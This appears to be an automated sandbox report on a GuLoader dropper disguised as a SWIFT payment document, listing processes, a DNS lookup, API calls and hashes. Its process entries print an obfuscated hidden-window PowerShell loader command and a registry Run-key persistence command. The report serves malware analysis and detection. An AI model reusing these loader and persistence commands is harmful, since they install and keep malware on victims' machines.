Mar 18, 2024 14:37:12.398525000 CET	192.168.2.4	1.1.1.1	0xbe19	Standard query (0)	g-eurasia-ru.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 18, 2024 14:37:12.559487104 CET	1.1.1.1	192.168.2.4	0xbe19	No error (0)	g-eurasia-ru.com		192.121.162.150	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	14:36:39
Start date:	18/03/2024
Path:	C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
Imagebase:	0x400000
File size:	403'933 bytes
MD5 hash:	724AC474C4FCAA1DF6DA3F9245AC9C85
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:36:41
Start date:	18/03/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading)
Imagebase:	0xea0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2601234406.0000000008F67000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:36:41
Start date:	18/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:36:42
Start date:	18/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe" /c "set /A 1^^0
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:37:05
Start date:	18/03/2024
Path:	C:\Users\user\AppData\Local\Temp\Vitis.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Vitis.exe
Imagebase:	0x400000
File size:	403'933 bytes
MD5 hash:	724AC474C4FCAA1DF6DA3F9245AC9C85
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2926040964.00000000018C7000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	14:37:11
Start date:	18/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:37:11
Start date:	18/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:37:11
Start date:	18/03/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)"
Imagebase:	0xdc0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	25.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.9%
Total number of Nodes:	1390
Total number of Limit Nodes:	45

Executed Functions

Function 004034F7 Relevance: 86.2, APIs: 33, Strings: 16, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 0040351A
GetVersionExW.KERNEL32(?), ref: 00403543
GetVersionExW.KERNEL32(0000011C), ref: 0040355A
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
#17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
OleInitialize.OLE32(00000000), ref: 00403634
SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
CharNextW.USER32(00000000,"C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe",00000020,"C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe",00000000), ref: 004036A0
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
DeleteFileW.KERNELBASE(1033), ref: 00403839
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F

Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe",00000000,?), ref: 00403946
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
CopyFileW.KERNEL32(C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,00420EC8,00000001), ref: 004039D8
CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
OleUninitialize.OLE32(?), ref: 00403A28
ExitProcess.KERNEL32 ref: 00403A42
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
ExitProcess.KERNEL32 ref: 00403AD6

Strings

UXTHEME, xrefs: 004035E5, 004035EA, 004035F0
"C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe", xrefs: 0040366D, 00403673, 00403688, 0040385F, 0040386B, 004038B9, 004038C3
1033, xrefs: 00403834
NSIS Error, xrefs: 00403658
\Temp, xrefs: 004037EA
Error launching installer, xrefs: 004038C9
Low, xrefs: 00403806
.tmp, xrefs: 00403934
~nsu, xrefs: 00403918
SeShutdownPrivilege, xrefs: 00403A6B
TEMP, xrefs: 00403818
C:\Users\user\Desktop, xrefs: 0040393F, 00403944, 00403977
C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, xrefs: 004039D3
C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne, xrefs: 004037B8, 004038E7, 0040396E, 00403978
C:\Users\user\AppData\Local\Temp\, xrefs: 004037C8, 004037CD, 004037E3, 004037EF, 004037FE, 0040380B, 00403817, 0040381F, 0040391D, 0040392E, 00403939, 00403945, 00403956, 00403965, 00403A1B
TMP, xrefs: 00403820

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne$C:\Users\user\Desktop$C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-1758701899
Opcode ID: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
Opcode Fuzzy Hash: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405706
GetDlgItem.USER32(?,000003EE), ref: 00405715
GetClientRect.USER32(?,?), ref: 00405752
GetSystemMetrics.USER32(00000002), ref: 00405759
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
ShowWindow.USER32(?,00000008), ref: 004057F5
GetDlgItem.USER32(?,000003EC), ref: 00405816
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
GetDlgItem.USER32(?,000003F8), ref: 00405724

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

GetDlgItem.USER32(?,000003EC), ref: 00405868
CreateThread.KERNELBASE(00000000,00000000,Function_0000563C,00000000), ref: 00405876
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040587D
ShowWindow.USER32(00000000), ref: 004058A1
ShowWindow.USER32(?,00000008), ref: 004058A6
ShowWindow.USER32(00000008), ref: 004058F0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
CreatePopupMenu.USER32 ref: 00405935
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
GetWindowRect.USER32(?,?), ref: 00405969
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
OpenClipboard.USER32(00000000), ref: 004059CA
EmptyClipboard.USER32 ref: 004059D0
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
GlobalLock.KERNEL32(00000000), ref: 004059E6
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
CloseClipboard.USER32 ref: 00405A2B

Strings

{, xrefs: 0040590E

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: 69f2edf26230f29e268ef45ac4ed4cb659919fb54a3fa664988597a572f6dd3e
Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
Opcode Fuzzy Hash: 69f2edf26230f29e268ef45ac4ed4cb659919fb54a3fa664988597a572f6dd3e
Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00405C13 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
lstrcatW.KERNEL32(Nightingalize.flo,\*.*), ref: 00405C84
lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
lstrlenW.KERNEL32(?,?,0040A014,?,Nightingalize.flo,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
FindFirstFileW.KERNELBASE(Nightingalize.flo,?,?,?,0040A014,?,Nightingalize.flo,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
FindClose.KERNEL32(00000000), ref: 00405D6C

Strings

\*.*, xrefs: 00405C7E
., xrefs: 00405CE2
Nightingalize.flo, xrefs: 00405C6C, 00405C72, 00405C83, 00405CBC
., xrefs: 00405CCE
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C20

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$Nightingalize.flo$\*.*
API String ID: 2035342205-2367672989
Opcode ID: 22b78437034c19dc3c69d1be1f85d3962df73c454374f768f30d5383a4f62e3f
Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
Opcode Fuzzy Hash: 22b78437034c19dc3c69d1be1f85d3962df73c454374f768f30d5383a4f62e3f
Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(74DF3420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
FindClose.KERNELBASE(00000000), ref: 00406854

Strings

XgB, xrefs: 0040683E

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: XgB
API String ID: 2295610775-796949446
Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 6811baaf47db24cfac7ebdc10481c5fcd69a9e6f97522136bc8b2f89416beb60
Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
Opcode Fuzzy Hash: 6811baaf47db24cfac7ebdc10481c5fcd69a9e6f97522136bc8b2f89416beb60
Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 554cdb13688f7b56c37498335d5809ca92329a56170aef0c3fc70529fa211c7f
Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
Opcode Fuzzy Hash: 554cdb13688f7b56c37498335d5809ca92329a56170aef0c3fc70529fa211c7f
Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
ShowWindow.USER32(?), ref: 00403FC0
GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
ShowWindow.USER32(?,00000004), ref: 00403FEB
DestroyWindow.USER32 ref: 00403FFF
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
GetDlgItem.USER32(?,?), ref: 00404037
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
IsWindowEnabled.USER32(00000000), ref: 00404052
GetDlgItem.USER32(?,00000001), ref: 004040FD
GetDlgItem.USER32(?,00000002), ref: 00404107
SetClassLongW.USER32(?,000000F2,?), ref: 00404121
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
GetDlgItem.USER32(?,00000003), ref: 00404218
ShowWindow.USER32(00000000,?), ref: 00404239
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
EnableWindow.USER32(?,?), ref: 00404266
